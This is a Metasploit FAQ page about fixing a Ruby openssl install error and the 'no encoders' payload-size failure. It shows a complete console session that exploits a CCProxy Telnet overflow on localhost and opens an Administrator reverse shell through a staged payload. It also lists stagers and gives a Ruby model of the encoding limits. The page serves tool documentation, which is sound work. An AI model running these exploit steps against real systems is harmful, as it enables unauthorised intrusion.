Metasploit/Frequently Asked Questions

=Installation=

==no such file to load -- openssl (LoadError)==
Q: When running Metasploit for the first time, I get the error: "no such file to load -- openssl (LoadError)"


 * Example:

 [~/metasploit]# ./msfgui
 ./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
         from ./lib/rex/socket/ssl_tcp_server.rb:4
         from ./lib/rex/socket/comm/local.rb:5:in `require'
         from ./lib/rex/socket/comm/local.rb:5
         from ./lib/rex/socket.rb:22:in `require'
         from ./lib/rex/socket.rb:22
         from ./lib/rex.rb:71:in `require'
         from ./lib/rex.rb:71
         from ./msfgui:10:in `require'
         from ./msfgui:10

A: Metasploit requires the Ruby implementation of openssl - not the standard C implementation of openssl used by Apache etc. Install the relevant ruby-openssl library.

 * Example (for Debian - check your OS or try using gem):

 pwebster@metasploit:~$ apt-cache search ruby | grep openssl
 libopenssl-ruby - OpenSSL interface for Ruby
 libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9

 pwebster@metasploit:~# apt-get install libopenssl-ruby

=Exploit Modules=

==Exploit failed: No encoders encoded the buffer successfully==
Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: "[-] Exploit failed: No encoders encoded the buffer successfully."


 * Example:

 msf > use windows/proxy/ccproxy_telnet_ping
 msf exploit(ccproxy_telnet_ping) > info

        Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
     Version: $Revision$
    Platform: Windows
  Privileged: No
     License: Metasploit Framework License

 Provided by:
   Patrick Webster

 Available targets:
   Id  Name
   --  ----
   0   Windows 2000 Pro SP0 - English
   1   Windows 2000 Pro SP1 - English
   2   Windows 2000 Pro SP2 - English
   3   Windows 2000 Pro SP3 - English
   4   Windows 2000 Pro SP4 - English
   5   Windows XP SP0/1 - English
   6   Windows 2003 Server SP0/1 - English

 Basic options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  127.0.0.1        yes       The target address
   RPORT  23               yes       The target port

 Payload information:
   Space: 200
   Avoid: 5 characters

 Description:
   This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
   service. The stack is overwritten when sending an overly long
   address to the 'ping' command.

 msf exploit(ccproxy_telnet_ping) > set TARGET 4
 TARGET => 4
 msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
 PAYLOAD => windows/shell_reverse_tcp
 msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
 LHOST => 127.0.0.1
 msf exploit(ccproxy_telnet_ping) > check
 [*] The target appears to be vulnerable.
 msf exploit(ccproxy_telnet_ping) > exploit
 [-] Exploit failed: No encoders encoded the buffer successfully.

A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is 'Space: 200'. In addition, the target application does not allow certain characters to be used (usually the null character 0x00, as this denotes the end of a string [character array]). In the example, the payload must avoid five characters: 'Avoid: 5 characters'.

When you run the exploit, the payload generators will attempt to fit your desired payload into a space of 200 while excluding 5 specific characters. This is not always possible, and when it fails the result is the error: No encoders encoded the buffer successfully.

However, all is not lost. The Metasploit Framework supports staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as a reverse shell) directly, starts a staging platform to which the rest of the payload can then be added. So in our example, instead of sending a complete reverse shell, it will:


 * 1) Create the staging platform.
 * 2) Allocate enough memory to hold your desired payload.
 * 3) Obtain the rest of the payload from you.
 * 4) Execute the payload as a whole.
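
The space and bad-character constraint described above can be modelled in a few lines. This is an added example, not Metasploit's encoder code: the XOR scheme, the bad-character set (the page gives only a count), the decoder overhead and both buffer sizes are constructed assumptions.

```ruby
# Simplified model of the size/bad-character check; NOT Metasploit's encoder code.
SPACE = 200                                        # "Space: 200" from the module info
BADCHARS = [0x00, 0x0a, 0x0d, 0x20, 0x40].freeze   # constructed; the page lists only a count
DECODER_OVERHEAD = 24                              # assumed decoder stub size (hypothetical)

class NoEncoderFit < StandardError; end

# Toy encoder: the first single-byte XOR key for which neither the key
# nor any encoded byte is a bad character, or nil if no such key exists.
def find_xor_key(bytes, badchars)
  (1..255).find do |key|
    !badchars.include?(key) && bytes.none? { |b| badchars.include?(b ^ key) }
  end
end

# Returns the encoded bytes (the decoder stub is modelled only by its size),
# or raises NoEncoderFit when bad characters or the space limit rule it out.
def encode_for_space(bytes, space: SPACE, badchars: BADCHARS)
  if bytes.none? { |b| badchars.include?(b) }
    encoded, needed = bytes, bytes.length          # already clean, no decoder needed
  else
    key = find_xor_key(bytes, badchars)
    raise NoEncoderFit, 'no key avoids every bad character' if key.nil?
    encoded = bytes.map { |b| b ^ key }
    needed = bytes.length + DECODER_OVERHEAD
  end
  raise NoEncoderFit, "#{needed} bytes needed, #{space} available" if needed > space
  encoded
end

# Boolean wrapper: true when the buffer can be placed in the available space.
def fits?(bytes, **opts)
  encode_for_space(bytes, **opts)
  true
rescue NoEncoderFit
  false
end

# Constructed stand-in buffers (placeholder bytes, not real payloads).
INLINE_STANDIN = Array.new(300) { |i| i % 16 }     # models a large inline payload
STAGER_STANDIN = Array.new(150) { |i| i % 16 }     # models a small stager

if __FILE__ == $PROGRAM_NAME
  puts "inline fits in #{SPACE}: #{fits?(INLINE_STANDIN)}"
  puts "stager fits in #{SPACE}: #{fits?(STAGER_STANDIN)}"
end
```

The model has two failure paths: the encoded buffer plus decoder exceeds the space, or no encoding avoids every bad character at all. Only the first can be cured by a smaller first stage.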

Generally, all the staged payloads are denoted by the '/' after the desired payload. Some examples are:

 windows/dllinject/reverse_tcp         Windows Inject DLL, Reverse TCP Stager
 windows/download_exec/bind_tcp        Windows Executable Download and Execute, Bind TCP Stager
 windows/exec/find_tag                 Windows Execute Command, Find Tag Ordinal Stager
 windows/meterpreter/reverse_tcp       Windows Meterpreter, Reverse TCP Stager
 windows/shell/reverse_tcp             Windows Command Shell, Reverse TCP Stager
 windows/upexec/bind_tcp               Windows Upload/Execute, Bind TCP Stager
 windows/vncinject/reverse_ord_tcp     Windows VNC Inject, Reverse Ordinal TCP Stager

So now that we know it cannot fit an 'Inline' payload, we can use a stager instead:

 ...
 msf exploit(ccproxy_telnet_ping) > exploit
 [-] Exploit failed: No encoders encoded the buffer successfully.
 msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
 PAYLOAD => windows/shell/reverse_tcp
 msf exploit(ccproxy_telnet_ping) > exploit
 [*] Started reverse handler
 [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
 [*] Sending stage (474 bytes)
 [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp.

 C:\Documents and Settings\Administrator>